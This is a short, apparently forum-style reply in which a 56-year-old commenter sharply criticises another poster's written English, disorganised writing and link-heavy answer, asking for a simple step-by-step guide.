So, here it starts, attitude. I'm 56 and will shortly be 57. I am no millennial. Secondly, perhaps you should focus on your English grammar skills. While you may speak several languages, your skill with written English is atrocious. Even if your English grammar was passable, you have no skill at writing an organized and cohesive text. A simple, step-by-step guide to accomplish the task. Putting up a few links mixed with gibberish is not helpful. It's lazy and sloppy. Have some pride in your work. Exhibit some maturity and avoid superfluous writing.